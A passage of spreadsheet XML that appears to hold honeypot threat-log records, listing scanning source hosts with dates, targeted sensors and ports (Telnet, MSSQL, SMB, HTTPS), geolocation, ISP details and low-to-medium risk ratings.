    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;31790&amp;&amp;NA&amp;&amp;40451"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d54:bb87"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2319"/>
    <x v="2319"/>
    <s v="node-28p.pool-125-27.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-10T21:08:24"/>
    <d v="2025-04-10T21:08:24"/>
    <d v="2025-04-10T21:08:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Khun Thian"/>
    <s v="Bang Khun Thian"/>
    <s v="1619485"/>
    <s v="NA"/>
    <s v="13.663"/>
    <s v="100.434"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:7d1b:b59"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2320"/>
    <x v="2320"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T20:38:07"/>
    <d v="2025-01-19T08:33:01"/>
    <d v="2025-04-10T20:38:07"/>
    <n v="64"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23&amp;&amp;NA&amp;&amp;46950&amp;&amp;50512&amp;&amp;49722&amp;&amp;53828&amp;&amp;54036&amp;&amp;54022"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Fernandes Tourinho"/>
    <s v="Fernandes Tourinho"/>
    <s v="3460688"/>
    <s v="NA"/>
    <s v="-19.1526"/>
    <s v="-42.0802"/>
    <s v="266479"/>
    <s v="CONNECT FIBRA"/>
    <s v="Connect Fibra"/>
    <s v="business"/>
    <s v="Connect Fibra"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:aaf4:2c9e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2321"/>
    <x v="2321"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T19:35:12"/>
    <d v="2024-04-10T05:22:00"/>
    <d v="2025-04-10T19:35:12"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;16612&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Talegaon Dābhāde"/>
    <s v="1255134"/>
    <s v="NA"/>
    <s v="18.735"/>
    <s v="73.6756"/>
    <s v="17762"/>
    <s v="Tata Teleservices (Maharashtra) Ltd"/>
    <s v="Tata Teleservices Limited"/>
    <s v="business"/>
    <s v="Tata Teleservices Limited -GSM Division"/>
    <s v="2010-06-07"/>
    <s v="TATA-DOCOMO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.107.1.98,54516)}&amp;&amp;{Data_SMB:Incoming connection (27.107.1.98,55157)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b6b:162"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2322"/>
    <x v="2322"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T19:22:50"/>
    <d v="2025-04-10T19:22:35"/>
    <d v="2025-04-10T19:22:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58f9:5f41"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2323"/>
    <x v="2323"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T19:17:24"/>
    <d v="2025-04-10T13:32:26"/>
    <d v="2025-04-10T19:17:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:1924"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2324"/>
    <x v="2324"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T18:23:24"/>
    <d v="2025-04-10T18:23:24"/>
    <d v="2025-04-10T18:23:24"/>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d6:8cce"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2325"/>
    <x v="2325"/>
    <s v="059188105227.ctinets.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-10T18:10:40"/>
    <d v="2025-02-09T22:22:47"/>
    <d v="2025-04-10T18:10:40"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="NWT"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bbc:69e3"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2326"/>
    <x v="2326"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T18:07:58"/>
    <d v="2025-04-10T18:07:58"/>
    <d v="2025-04-10T18:07:58"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:5e46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2327"/>
    <x v="2327"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T17:47:12"/>
    <d v="2025-04-10T17:47:12"/>
    <d v="2025-04-10T17:47:12"/>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d8:1c58"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2328"/>
    <x v="2328"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:48:59"/>
    <d v="2025-03-04T10:09:23"/>
    <d v="2025-04-10T16:48:59"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="134319"/>
    <s v="Elyzium Technologies Pvt. Ltd."/>
    <s v="Elyzium Softech"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:674b:2021"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2329"/>
    <x v="2329"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:45:18"/>
    <d v="2025-02-04T16:44:57"/>
    <d v="2025-04-10T16:45:18"/>
    <n v="1603"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="9100&amp;&amp;1433&amp;&amp;1080&amp;&amp;1521&amp;&amp;45388&amp;&amp;3389&amp;&amp;60827&amp;&amp;27401&amp;&amp;58674&amp;&amp;24947&amp;&amp;26368&amp;&amp;47476&amp;&amp;38227&amp;&amp;59629&amp;&amp;32606&amp;&amp;25287&amp;&amp;52441&amp;&amp;51891&amp;&amp;56067&amp;&amp;50333&amp;&amp;55527&amp;&amp;52551&amp;&amp;63156&amp;&amp;22638&amp;&amp;61251&amp;&amp;52846&amp;&amp;24666&amp;&amp;54125&amp;&amp;52826&amp;&amp;54157&amp;&amp;58144&amp;&amp;51560&amp;&amp;55115&amp;&amp;50499&amp;&amp;57463&amp;&amp;51882&amp;&amp;58408&amp;&amp;59153&amp;&amp;53912&amp;&amp;55793&amp;&amp;51901&amp;&amp;31634&amp;&amp;31930&amp;&amp;36579&amp;&amp;57343&amp;&amp;32308&amp;&amp;51581&amp;&amp;54665&amp;&amp;55197&amp;&amp;63002&amp;&amp;53774&amp;&amp;62949&amp;&amp;48596&amp;&amp;50002&amp;&amp;28143&amp;&amp;49364&amp;&amp;32654&amp;&amp;42376&amp;&amp;46535&amp;&amp;64327&amp;&amp;60988&amp;&amp;53411&amp;&amp;30238&amp;&amp;24836&amp;&amp;30014&amp;&amp;38904&amp;&amp;39559&amp;&amp;37811&amp;&amp;41388&amp;&amp;37137&amp;&amp;38643&amp;&amp;49948&amp;&amp;62520&amp;&amp;60106&amp;&amp;29555&amp;&amp;45733&amp;&amp;42168&amp;&amp;54864&amp;&amp;53557&amp;&amp;23464&amp;&amp;47712&amp;&amp;61377&amp;&amp;57859&amp;&amp;22038&amp;&amp;25244&amp;&amp;50629&amp;&amp;56056&amp;&amp;55733&amp;&amp;56149&amp;&amp;50481&amp;&amp;49882&amp;&amp;58828&amp;&amp;22519&amp;&amp;55004&amp;&amp;51048&amp;&amp;55576&amp;&amp;63803&amp;&amp;56325&amp;&amp;50445&amp;&amp;29493&amp;&amp;27859&amp;&amp;29304&amp;&amp;62210&amp;&amp;57291&amp;&amp;54539&amp;&amp;52132&amp;&amp;55425&amp;&amp;57552&amp;&amp;57502&amp;&amp;50093&amp;&amp;51946&amp;&amp;59588&amp;&amp;64591&amp;&amp;62367&amp;&amp;49597&amp;&amp;54657&amp;&amp;30747&amp;&amp;65516&amp;&amp;31605&amp;&amp;57850&amp;&amp;51256&amp;&amp;53891&amp;&amp;60178&amp;&amp;30743&amp;&amp;55276&amp;&amp;55241&amp;&amp;28240&amp;&amp;62152&amp;&amp;52939&amp;&amp;25439&amp;&amp;26241&amp;&amp;28021&amp;&amp;56775&amp;&amp;24081&amp;&amp;52935&amp;&amp;53125&amp;&amp;52281&amp;&amp;50549&amp;&amp;60418&amp;&amp;37742&amp;&amp;51167&amp;&amp;30986&amp;&amp;51812&amp;&amp;61658&amp;&amp;54255&amp;&amp;59256&amp;&amp;55896&amp;&amp;60516&amp;&amp;59195&amp;&amp;28552&amp;&amp;27467&amp;&amp;51915&amp;&amp;65290&amp;&amp;63061&amp;&amp;64697&amp;&amp;48619&amp;&amp;49581&amp;&amp;51622&amp;&amp;63125&amp;&amp;56105&amp;&amp;56486&amp;&amp;52086&amp;&amp;57319&amp;&amp;64060&amp;&amp;60107&amp;&amp;49207&amp;&amp;49463&amp;&amp;51251&amp;&amp;51754&amp;&amp;55130&amp;&amp;48774&amp;&amp;48645&amp;&amp;22187&amp;&amp;56423&amp;&amp;53696&amp;&amp;49904&amp;&amp;49192&amp;&amp;54970&amp;&amp;61917&amp;&amp;52553&amp;&amp;24231&amp;&amp;56589&amp;&amp;62060&amp;&amp;53717&amp;&amp;61458&amp;&amp;45031&amp;&amp;46083&amp;&amp;53983&amp;&amp;62122&amp;&amp;57017&amp;&amp;55418&amp;&amp;64330&amp;&amp;53703&amp;&amp;64437&amp;&amp;33758&amp;&amp;57243&amp;&amp;52904&amp;&amp;30418&amp;&amp;51964&amp;&amp;39566&amp;&amp;49379&amp;&amp;51873&amp;&amp;64079&amp;&amp;59412&amp;&amp;38786&amp;&amp;47918&amp;&amp;56055&amp;&amp;53149&amp;&amp;57022&amp;&amp;33650&amp;&amp;63270&amp;&amp;49729&amp;&amp;50649&amp;&amp;25238&amp;&amp;28649&amp;&amp;59332&amp;&amp;50180&amp;&amp;54781&amp;&amp;51687&amp;&amp;51309&amp;&amp;31892&amp;&amp;58738&amp;&amp;61191&amp;&amp;63011&amp;&amp;53223&amp;&amp;58780&amp;&amp;24977&amp;&amp;57203&amp;&amp;50295&amp;&amp;26878&amp;&amp;62901&amp;&amp;55458&amp;&amp;59103&amp;&amp;41772&amp;&amp;45838&amp;&amp;64544&amp;&amp;58219&amp;&amp;62863&amp;&amp;33982&amp;&amp;44620&amp;&amp;61762&amp;&amp;26248&amp;&amp;56357&amp;&amp;61322&amp;&amp;29592&amp;&amp;36248&amp;&amp;56951&amp;&amp;28020&amp;&amp;38059&amp;&amp;63152&amp;&amp;63122&amp;&amp;61132&amp;&amp;31544&amp;&amp;50952&amp;&amp;54055&amp;&amp;45852&amp;&amp;49240&amp;&amp;61616&amp;&amp;29132&amp;&amp;63492&amp;&amp;24394&amp;&amp;55664&amp;&amp;54177&amp;&amp;56237&amp;&amp;35266&amp;&amp;43112&amp;&amp;23698&amp;&amp;35138&amp;&amp;32186&amp;&amp;28607&amp;&amp;60838&amp;&amp;43107&amp;&amp;25316&amp;&amp;60850&amp;&amp;54228&amp;&amp;58084&amp;&amp;64959&amp;&amp;24219&amp;&amp;58060&amp;&amp;63481&amp;&amp;64341&amp;&amp;37308&amp;&amp;60712&amp;&amp;47736&amp;&amp;54444&amp;&amp;30970&amp;&amp;61194&amp;&amp;57688&amp;&amp;51423&amp;&amp;50349&amp;&amp;56943&amp;&amp;40583&amp;&amp;62471&amp;&amp;49131&amp;&amp;54995&amp;&amp;32631&amp;&amp;63768&amp;&amp;32098&amp;&amp;36258&amp;&amp;34382&amp;&amp;36964&amp;&amp;34025&amp;&amp;40142&amp;&amp;52658&amp;&amp;36309&amp;&amp;38359&amp;&amp;49177&amp;&amp;64174&amp;&amp;34687&amp;&amp;51947&amp;&amp;54920&amp;&amp;63303&amp;&amp;65413&amp;&amp;22724&amp;&amp;23278&amp;&amp;54156&amp;&amp;59918&amp;&amp;60892&amp;&amp;53055&amp;&amp;25837&amp;&amp;57811&amp;&amp;54891&amp;&amp;58425&amp;&amp;28142&amp;&amp;65275&amp;&amp;44014&amp;&amp;43629&amp;&amp;44771&amp;&amp;60797&amp;&amp;40329&amp;&amp;53547&amp;&amp;43077&amp;&amp;50080&amp;&amp;40526&amp;&amp;53997&amp;&amp;54174&amp;&amp;49939&amp;&amp;57776&amp;&amp;51210&amp;&amp;59282&amp;&amp;21136&amp;&amp;51924&amp;&amp;48831&amp;&amp;53113&amp;&amp;54315&amp;&amp;51082&amp;&amp;32040&amp;&amp;64504&amp;&amp;53949&amp;&amp;22257&amp;&amp;60616&amp;&amp;58663&amp;&amp;26189&amp;&amp;57601&amp;&amp;64645&amp;&amp;48935&amp;&amp;61188&amp;&amp;21633&amp;&amp;65043&amp;&amp;20869&amp;&amp;51886&amp;&amp;48688&amp;&amp;43853&amp;&amp;65307&amp;&amp;25907&amp;&amp;26769&amp;&amp;64999&amp;&amp;53589&amp;&amp;20811&amp;&amp;63614&amp;&amp;21971&amp;&amp;48247&amp;&amp;57708&amp;&amp;57109&amp;&amp;47521&amp;&amp;60698&amp;&amp;25747&amp;&amp;20849&amp;&amp;25757&amp;&amp;55297&amp;&amp;31512&amp;&amp;63826&amp;&amp;28061&amp;&amp;62306&amp;&amp;62195&amp;&amp;30637&amp;&amp;31511&amp;&amp;21086&amp;&amp;52671&amp;&amp;51638&amp;&amp;36216&amp;&amp;39958&amp;&amp;21896&amp;&amp;37866&amp;&amp;52870&amp;&amp;37249&amp;&amp;52229&amp;&amp;64244&amp;&amp;49703&amp;&amp;63458&amp;&amp;49530&amp;&amp;48905&amp;&amp;50278&amp;&amp;58460&amp;&amp;64420&amp;&amp;60924&amp;&amp;34032&amp;&amp;49697&amp;&amp;43893&amp;&amp;45183&amp;&amp;51895&amp;&amp;52944&amp;&amp;31796&amp;&amp;25533&amp;&amp;36322&amp;&amp;26858&amp;&amp;57759&amp;&amp;52921&amp;&amp;34812&amp;&amp;62565&amp;&amp;58498&amp;&amp;31358&amp;&amp;46950&amp;&amp;38542&amp;&amp;51501&amp;&amp;33243&amp;&amp;61966&amp;&amp;54294&amp;&amp;26859&amp;&amp;59797&amp;&amp;62679&amp;&amp;31777&amp;&amp;51248&amp;&amp;33823&amp;&amp;28533&amp;&amp;62788&amp;&amp;52985&amp;&amp;60277&amp;&amp;48798&amp;&amp;60383&amp;&amp;54456&amp;&amp;46598&amp;&amp;50144&amp;&amp;61747&amp;&amp;45373&amp;&amp;58296&amp;&amp;55667&amp;&amp;48245&amp;&amp;47581&amp;&amp;46753&amp;&amp;61437&amp;&amp;50108&amp;&amp;55038&amp;&amp;44449&amp;&amp;44730&amp;&amp;53710&amp;&amp;63316&amp;&amp;35476&amp;&amp;54475&amp;&amp;41380&amp;&amp;55459&amp;&amp;55644&amp;&amp;62657&amp;&amp;58895&amp;&amp;60507&amp;&amp;35891&amp;&amp;30173&amp;&amp;35435&amp;&amp;53208&amp;&amp;61649&amp;&amp;35023&amp;&amp;57013&amp;&amp;34586&amp;&amp;63530&amp;&amp;25874&amp;&amp;62283&amp;&amp;22029&amp;&amp;64201&amp;&amp;56095&amp;&amp;20850&amp;&amp;63306&amp;&amp;56371&amp;&amp;59183&amp;&amp;54556&amp;&amp;57533&amp;&amp;60024&amp;&amp;51643&amp;&amp;55821&amp;&amp;62264&amp;&amp;55322&amp;&amp;23968&amp;&amp;24218&amp;&amp;24705&amp;&amp;54543&amp;&amp;26464&amp;&amp;28384&amp;&amp;60429&amp;&amp;57060&amp;&amp;51580&amp;&amp;57978&amp;&amp;27538&amp;&amp;50833&amp;&amp;45223&amp;&amp;38549&amp;&amp;39627&amp;&amp;51713&amp;&amp;60269&amp;&amp;39860&amp;&amp;32645&amp;&amp;55214&amp;&amp;51219&amp;&amp;24845&amp;&amp;52203&amp;&amp;25677&amp;&amp;65202&amp;&amp;61590&amp;&amp;26142&amp;&amp;57443&amp;&amp;61732&amp;&amp;54120&amp;&amp;55561&amp;&amp;58129&amp;&amp;62259&amp;&amp;58252&amp;&amp;50096&amp;&amp;63654&amp;&amp;52382&amp;&amp;53754&amp;&amp;57065&amp;&amp;57238&amp;&amp;56807&amp;&amp;62538&amp;&amp;63997&amp;&amp;34126&amp;&amp;44849&amp;&amp;45116&amp;&amp;52130&amp;&amp;47967&amp;&amp;21335&amp;&amp;54356&amp;&amp;61539&amp;&amp;53187&amp;&amp;25371&amp;&amp;44503&amp;&amp;39118&amp;&amp;50823&amp;&amp;60743&amp;&amp;42379&amp;&amp;52648&amp;&amp;33326&amp;&amp;35940&amp;&amp;47896&amp;&amp;49250&amp;&amp;50905&amp;&amp;54364&amp;&amp;52220&amp;&amp;39999&amp;&amp;49382&amp;&amp;57508&amp;&amp;33042&amp;&amp;42476&amp;&amp;54564&amp;&amp;62408&amp;&amp;63108&amp;&amp;29032&amp;&amp;28954&amp;&amp;59574&amp;&amp;59774&amp;&amp;30085&amp;&amp;57642&amp;&amp;54098&amp;&amp;36418&amp;&amp;61956&amp;&amp;59245&amp;&amp;44329&amp;&amp;56918&amp;&amp;42479&amp;&amp;30969&amp;&amp;46293&amp;&amp;24371&amp;&amp;24990&amp;&amp;53967&amp;&amp;38195&amp;&amp;20889&amp;&amp;23441&amp;&amp;31482&amp;&amp;50367&amp;